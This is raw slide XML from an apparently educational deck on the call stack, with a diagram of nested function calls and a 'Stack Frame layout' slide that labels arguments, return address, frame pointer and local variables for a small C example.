              <a:t>main()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625150" y="2171225"/>
            <a:ext cx="1287900" cy="466500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625150" y="2637850"/>
            <a:ext cx="1287900" cy="466500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>B()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625149" y="3104454"/>
            <a:ext cx="1287900" cy="466500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>D()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628812" y="2626475"/>
            <a:ext cx="1287900" cy="466500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>C()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741480" y="1446152"/>
            <a:ext cx="829500" cy="2155800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>main()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>   A();</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  B();</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  C();</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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15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1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6009848" y="1399827"/>
            <a:ext cx="1247700" cy="1710900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>B()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  D();</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>C()</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  D();</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="15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 sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1500" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750900" y="3299050"/>
            <a:ext cx="1133100" cy="3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Low addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750900" y="1369950"/>
            <a:ext cx="1133100" cy="3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high addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1235100" y="1676513"/>
            <a:ext cx="10200" cy="1792200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911900" y="1220488"/>
            <a:ext cx="4800" cy="26508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22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1610200" y="1292513"/>
            <a:ext cx="10200" cy="2560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3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3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3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3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3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3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156000" y="7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Stack Frame layout</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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 main() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	foo(1,2);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>void foo (int a, int b) {</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	int x, y</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x= a + b ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>y = a - b;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="3553900"/>
            <a:ext cx="1367700" cy="65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Local variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="2530075"/>
            <a:ext cx="1367700" cy="51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Return addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="1905125"/>
            <a:ext cx="1367700" cy="65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Arguments </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755975" y="3865675"/>
            <a:ext cx="1133100" cy="3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Low addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755325" y="1749200"/>
            <a:ext cx="1133100" cy="3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high addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="3015350"/>
            <a:ext cx="13677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Previous frame pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8013925" y="3594250"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187900" y="3278400"/>
            <a:ext cx="1996500" cy="3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Current</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> frame pointer </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8045325" y="1341800"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677625" y="1413825"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121525" y="3888825"/>
            <a:ext cx="1996500" cy="3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Current </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stack pointer </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8013925" y="4203850"/>
            <a:ext cx="360600" cy="1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